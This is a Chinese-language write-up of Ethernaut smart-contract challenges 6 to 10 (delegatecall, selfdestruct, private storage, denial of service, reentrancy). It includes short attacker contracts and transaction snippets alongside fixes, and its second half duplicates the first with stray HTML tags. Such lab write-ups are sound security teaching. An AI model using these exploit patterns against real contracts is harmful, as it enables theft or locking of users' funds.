Ethernaut 智能合约安全挑战解析（6-10关）<\/h1>

第六关：Delegatecall 漏洞<\/h2>

合约分析<\/h3>

本关包含两个合约：<\/p>

Delegate<\/code>：基础合约<\/li>

Delegation<\/code>：代理合约，使用 delegatecall 调用 Delegate 的功能<\/li>
<\/ul>
关键点：<\/p>

Delegation<\/code> 合约的 fallback()<\/code> 函数使用 delegatecall<\/code> 调用 Delegate<\/code> 合约<\/li>
delegatecall<\/code> 在调用者（Delegation）的存储上下文中执行目标合约（Delegate）的代码<\/li>
msg.sender<\/code> 和 msg.value<\/code> 保持不变<\/li>
<\/ul>
delegatecall 特性<\/h3>

目标合约代码在调用者上下文中执行（继承调用合约的存储布局）<\/li>
msg.sender<\/code> 和 msg.value<\/code> 不变<\/li>
存储变量顺序不同可能导致存储冲突和安全漏洞<\/li>
<\/ol>
攻击方法<\/h3>
通过调用 Delegation<\/code> 合约中不存在的函数触发 fallback()<\/code>，使用 delegatecall<\/code> 执行 Delegate<\/code> 的 pwn()<\/code> 函数来修改 Delegation<\/code> 的 owner<\/code>。<\/p>
攻击代码示例：<\/p>
\/\/ 调用不存在的函数触发 fallback
<\/span><\/span><\/span><\/span>await<\/span> contract<\/span>.sendTransaction<\/span>({
<\/span><\/span>  data<\/span>:<\/span> web3<\/span>.utils<\/span>.keccak256<\/span>("pwn()"<\/span>).substring<\/span>(0<\/span>, 10<\/span>)
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>修复方案<\/h3>


限制 fallback 调用<\/strong>：<\/p>
modifier<\/span> onlyOwner<\/span> {
<\/span><\/span>  require(msg.sender ==<\/span> owner);
<\/span><\/span>  _<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>fallback() external<\/span> payable<\/span> onlyOwner {
<\/span><\/span>  \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

避免代理不受信任合约<\/strong>：<\/p>

直接调用 delegate.pwn()<\/code> 而非使用 delegatecall<\/code><\/li>
<\/ul>
<\/li>

使用 OpenZeppelin 的 Ownable<\/strong>：<\/p>

继承 Ownable<\/code> 合约提供 onlyOwner<\/code> 保护<\/li>
使用 transferOwnership(newOwner)<\/code> 安全转移所有权<\/li>
<\/ul>
<\/li>
<\/ol>
第七关：强制转账<\/h2>
关键知识点<\/h3>

selfdestruct<\/code> 是强制向合约转账的特殊方法<\/li>
即使合约没有 payable<\/code> 修饰符或 receive<\/code>\/fallback<\/code> 函数，selfdestruct<\/code> 也能强制转账<\/li>
<\/ul>
接收 ETH 的方式对比<\/h3>



方式<\/th>
触发条件<\/th>
需要 payable<\/th>
说明<\/th>
<\/tr>
<\/thead>


receive()<\/td>
仅接受无数据的 ETH 交易<\/td>
✅<\/td>
推荐方式<\/td>
<\/tr>

fallback()<\/td>
带数据的 ETH 交易或无 receive() 时<\/td>
✅<\/td>
后备方案<\/td>
<\/tr>

selfdestruct()<\/td>
另一个合约 selfdestruct(this)<\/td>
❌<\/td>
强制发送 ETH<\/td>
<\/tr>

delegatecall<\/td>
目标合约可接收 ETH<\/td>
✅<\/td>
间接接收<\/td>
<\/tr>

block.coinbase<\/td>
矿工奖励<\/td>
❌<\/td>
特殊情况<\/td>
<\/tr>
<\/tbody>
<\/table>
攻击方法<\/h3>
创建攻击合约并调用 selfdestruct<\/code> 强制向目标合约转账：<\/p>
contract<\/span> Attacker<\/span> {
<\/span><\/span>    constructor<\/span>(address<\/span> payable<\/span> target) payable<\/span> {
<\/span><\/span>        selfdestruct(target);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第八关：私有变量读取<\/h2>
存储结构<\/h3>

Solidity 有四个存储区域：Storage、Memory、Calldata、Stack<\/li>
私有变量仍然存储在链上，可以通过存储槽访问<\/li>
<\/ul>
存储规则<\/h3>

状态变量按声明顺序分配存储槽<\/li>
第一个变量存储在 slot 0，第二个在 slot 1，依此类推<\/li>
小于 32 字节的连续变量可能打包到同一槽中<\/li>
<\/ol>
攻击方法<\/h3>
通过 web3.eth.getStorageAt<\/code> 读取私有变量：<\/p>
web3<\/span>.eth<\/span>.getStorageAt<\/span>(contract<\/span>.address<\/span>, 1<\/span>, function<\/span>(x<\/span>, y<\/span>) {
<\/span><\/span>  alert<\/span>(web3<\/span>.toAscii<\/span>(y<\/span>))
<\/span><\/span>})
<\/span><\/span><\/code><\/pre>修复方案<\/h3>


存储哈希值而非明文<\/strong>：<\/p>
bytes32<\/span> private<\/span> passwordHash;
<\/span><\/span>
<\/span><\/span>function<\/span> unlock<\/span>(bytes32<\/span> _password) public<\/span> {
<\/span><\/span>    require(keccak256(abi.encodePacked(_password)) ==<\/span> passwordHash);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

commit-reveal 方案<\/strong>：<\/p>

用户先提交密码哈希<\/li>
再提交密码进行验证<\/li>
<\/ul>
<\/li>

链下存储<\/strong>：<\/p>

将敏感数据存储在服务器或 IPFS 上<\/li>
<\/ul>
<\/li>
<\/ol>
第九关：拒绝服务<\/h2>
攻击思路<\/h3>
成为 king 后，在接收 ETH 的回调中 revert 交易，阻止后续转账成功。<\/p>
攻击合约示例：<\/p>
contract<\/span> Attacker<\/span> {
<\/span><\/span>    function<\/span> attack<\/span>(address<\/span> payable<\/span> target) public<\/span> payable<\/span> {
<\/span><\/span>        \/\/ 成为 king
<\/span><\/span><\/span><\/span>        target.call{value:<\/span> msg.value}(""<\/span>);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    receive() external<\/span> payable<\/span> {
<\/span><\/span>        revert(); \/\/ 拒绝后续转账
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>第十关：重入攻击<\/h2>
漏洞分析<\/h3>
合约存在经典的重入漏洞：<\/p>
function<\/span> withdraw<\/span>() public<\/span> {
<\/span><\/span>    if<\/span>(balances[msg.sender] ><\/span> 0<\/span>) {
<\/span><\/span>        (bool<\/span> result,) =<\/span> msg.sender.call{value:<\/span> balances[msg.sender]}(""<\/span>);
<\/span><\/span>        if<\/span>(result) {
<\/span><\/span>            balances[msg.sender] =<\/span> 0<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题在于先转账后更新余额，攻击者可以在转账回调中再次调用 withdraw<\/code>。<\/p>
攻击流程<\/h3>

攻击合约调用 withdraw<\/code><\/li>
目标合约转账给攻击合约<\/li>
攻击合约的 receive<\/code> 函数再次调用 withdraw<\/code><\/li>
重复直到合约资金耗尽<\/li>
<\/ol>
修复方案<\/h3>
检查-生效-交互模式<\/strong>：<\/p>
function<\/span> withdraw<\/span>() public<\/span> {
<\/span><\/span>    uint256<\/span> amount =<\/span> balances[msg.sender];
<\/span><\/span>    require(amount ><\/span> 0<\/span>, "No balance"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 先更新状态
<\/span><\/span><\/span><\/span>    balances[msg.sender] =<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 再交互
<\/span><\/span><\/span><\/span>    (bool<\/span> success, ) =<\/span> msg.sender.call{value:<\/span> amount}(""<\/span>);
<\/span><\/span>    require(success, "Transfer failed"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>防御措施<\/h3>

使用互斥锁（ReentrancyGuard）<\/li>
遵循"检查-生效-交互"模式<\/li>
限制外部调用后的操作<\/li>
使用 OpenZeppelin 的 ReentrancyGuard<\/code> 合约<\/li>
<\/ol>
总结<\/h2>
这五关涵盖了智能合约安全中的多个关键漏洞：<\/p>

delegatecall<\/code> 的存储上下文问题<\/li>
selfdestruct<\/code> 的强制转账特性<\/li>
私有变量的链上存储特性<\/li>
拒绝服务攻击<\/li>
经典的重入攻击<\/li>
<\/ol>
开发者应特别注意：<\/p>

谨慎使用低级调用（delegatecall\/call）<\/li>
不要假设私有变量真的私有<\/li>
遵循"检查-生效-交互"模式<\/li>
考虑所有可能的执行路径<\/li>
使用经过验证的安全模式（如 ReentrancyGuard）<\/li>
<\/ul>

方式<\/th>	触发条件<\/th>	需要 payable<\/th>	说明<\/th> <\/tr> <\/thead>
receive()<\/td>	仅接受无数据的 ETH 交易<\/td>	✅<\/td>	推荐方式<\/td> <\/tr>
fallback()<\/td>	带数据的 ETH 交易或无 receive() 时<\/td>	✅<\/td>	后备方案<\/td> <\/tr>
selfdestruct()<\/td>	另一个合约 selfdestruct(this)<\/td>	❌<\/td>	强制发送 ETH<\/td> <\/tr>
delegatecall<\/td>	目标合约可接收 ETH<\/td>	✅<\/td>	间接接收<\/td> <\/tr>
block.coinbase<\/td>	矿工奖励<\/td>	❌<\/td>	特殊情况<\/td> <\/tr> <\/tbody> <\/table> 攻击方法<\/h3> 创建攻击合约并调用 `selfdestruct<\/code> 强制向目标合约转账：<\/p>` contract<\/span> Attacker<\/span> { <\/span><\/span> constructor<\/span>(address<\/span> payable<\/span> target) payable<\/span> { <\/span><\/span> selfdestruct(target); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>第八关：私有变量读取<\/h2> 存储结构<\/h3> Solidity 有四个存储区域：Storage、Memory、Calldata、Stack<\/li> 私有变量仍然存储在链上，可以通过存储槽访问<\/li> <\/ul> 存储规则<\/h3> 状态变量按声明顺序分配存储槽<\/li> 第一个变量存储在 slot 0，第二个在 slot 1，依此类推<\/li> 小于 32 字节的连续变量可能打包到同一槽中<\/li> <\/ol> 攻击方法<\/h3> 通过 web3.eth.getStorageAt<\/code> 读取私有变量：<\/p> web3<\/span>.eth<\/span>.getStorageAt<\/span>(contract<\/span>.address<\/span>, 1<\/span>, function<\/span>(x<\/span>, y<\/span>) { <\/span><\/span> alert<\/span>(web3<\/span>.toAscii<\/span>(y<\/span>)) <\/span><\/span>}) <\/span><\/span><\/code><\/pre>修复方案<\/h3> 存储哈希值而非明文<\/strong>：<\/p> bytes32<\/span> private<\/span> passwordHash; <\/span><\/span> <\/span><\/span>function<\/span> unlock<\/span>(bytes32<\/span> _password) public<\/span> { <\/span><\/span> require(keccak256(abi.encodePacked(_password)) ==<\/span> passwordHash); <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> commit-reveal 方案<\/strong>：<\/p> 用户先提交密码哈希<\/li> 再提交密码进行验证<\/li> <\/ul> <\/li> 链下存储<\/strong>：<\/p> 将敏感数据存储在服务器或 IPFS 上<\/li> <\/ul> <\/li> <\/ol> 第九关：拒绝服务<\/h2> 攻击思路<\/h3> 成为 king 后，在接收 ETH 的回调中 revert 交易，阻止后续转账成功。<\/p> 攻击合约示例：<\/p> contract<\/span> Attacker<\/span> { <\/span><\/span> function<\/span> attack<\/span>(address<\/span> payable<\/span> target) public<\/span> payable<\/span> { <\/span><\/span> \/\/ 成为 king <\/span><\/span><\/span><\/span> target.call{value:<\/span> msg.value}(""<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> receive() external<\/span> payable<\/span> { <\/span><\/span> revert(); \/\/ 拒绝后续转账 <\/span><\/span><\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>第十关：重入攻击<\/h2> 漏洞分析<\/h3> 合约存在经典的重入漏洞：<\/p> function<\/span> withdraw<\/span>() public<\/span> { <\/span><\/span> if<\/span>(balances[msg.sender] ><\/span> 0<\/span>) { <\/span><\/span> (bool<\/span> result,) =<\/span> msg.sender.call{value:<\/span> balances[msg.sender]}(""<\/span>); <\/span><\/span> if<\/span>(result) { <\/span><\/span> balances[msg.sender] =<\/span> 0<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>问题在于先转账后更新余额，攻击者可以在转账回调中再次调用 withdraw<\/code>。<\/p> 攻击流程<\/h3> 攻击合约调用 withdraw<\/code><\/li> 目标合约转账给攻击合约<\/li> 攻击合约的 receive<\/code> 函数再次调用 withdraw<\/code><\/li> 重复直到合约资金耗尽<\/li> <\/ol> 修复方案<\/h3> 检查-生效-交互模式<\/strong>：<\/p> function<\/span> withdraw<\/span>() public<\/span> { <\/span><\/span> uint256<\/span> amount =<\/span> balances[msg.sender]; <\/span><\/span> require(amount ><\/span> 0<\/span>, "No balance"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 先更新状态 <\/span><\/span><\/span><\/span> balances[msg.sender] =<\/span> 0<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 再交互 <\/span><\/span><\/span><\/span> (bool<\/span> success, ) =<\/span> msg.sender.call{value:<\/span> amount}(""<\/span>); <\/span><\/span> require(success, "Transfer failed"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>防御措施<\/h3> 使用互斥锁（ReentrancyGuard）<\/li> 遵循"检查-生效-交互"模式<\/li> 限制外部调用后的操作<\/li> 使用 OpenZeppelin 的 ReentrancyGuard<\/code> 合约<\/li> <\/ol> 总结<\/h2> 这五关涵盖了智能合约安全中的多个关键漏洞：<\/p> delegatecall<\/code> 的存储上下文问题<\/li> selfdestruct<\/code> 的强制转账特性<\/li> 私有变量的链上存储特性<\/li> 拒绝服务攻击<\/li> 经典的重入攻击<\/li> <\/ol> 开发者应特别注意：<\/p> 谨慎使用低级调用（delegatecall\/call）<\/li> 不要假设私有变量真的私有<\/li> 遵循"检查-生效-交互"模式<\/li> 考虑所有可能的执行路径<\/li> 使用经过验证的安全模式（如 ReentrancyGuard）<\/li> <\/ul>